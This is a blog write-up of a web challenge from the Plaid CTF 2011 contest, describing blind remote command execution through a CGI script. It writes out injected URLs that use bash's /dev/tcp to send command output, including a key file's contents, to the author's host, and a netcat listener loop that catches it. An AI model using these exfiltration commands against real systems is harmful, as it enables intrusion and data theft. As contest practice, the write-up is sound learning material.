<p><strong>Plaid CtF 2011 &#8211; Writeup #16</strong><br />
Published 2011-04-25 at https://www.rajatswarup.com/blog/2011/04/25/plaid-ctf-2011-writeup-16/ (category: howto; tags: ctf, pctf2011, writeup)</p>
<p>The Plaid Parliament of Pwning organized their own Capture-the-Flag (CtF) contest this past weekend. It was an excellent CtF with about 36 challenges ranging over trivia, exploitation, reverse engineering, web exploitation, cryptography, and forensics.</p>
<p><strong>My writeup for #16 &#8211; Plain sight [200 pts] web</strong><br />
The problem was:</p>
<blockquote><p>
The time to strike is now! This fiendish AED employee decided to hide secret data on this website (http://a4.amalgamated.biz/cgi-bin/chroot.cgi)<br />
It seems that the employee was in the middle of creating the website when our operatives stumbled upon it.<br />
The good news is that there are surely bugs in the development version of this problem; the bad news is that currently no feedback is printed to users.<br />
Some of our leet operatives have determined a little bit about the machine: it runs in a read-only environment with only<br />
bash cat dc expand grep hd head id less ls more nl od pr rev sh sleep sort sum tail tar tr true tsort ul wc yes<br />
installed.</p>
<p>Find what AED is hiding, good luck and godspeed.</p></blockquote>
<p>The URL http://a4.amalgamated.biz/cgi-bin/chroot.cgi allowed remote code execution: the query string was run as a shell command, but, as the challenge text warns, nothing was printed back to the browser, so the output had to be sent somewhere else. bash, cat, less, more and ls were among the allowed binaries.</p>
<p>The first thing I did was check whether bash's built-in /dev/tcp redirection was allowed, using:<br />
http://a4.amalgamated.biz/cgi-bin/chroot.cgi?ls>/dev/tcp/MYIP/5000</p>
<p>That seemed to work, so I listed the directories one by one until I came across keyfolder/key and read it with<br />
http://a4.amalgamated.biz/cgi-bin/chroot.cgi?cat%20keyfolder/key>/dev/tcp/MYIP/5000<br />
I had the port forwarded to my PC and a netcat listener running in a loop (nc exits after each connection closes, so the loop restarts it for the next request):<br />
<code> while [ 1 ]<br />
 do<br />
   nc -l -v -p 5000   # listen on port 5000 and print whatever the target sends<br />
 done<br />
</code><br />
The answer was esc4p3_str1ng5.</p>
<p>Fun times!</p>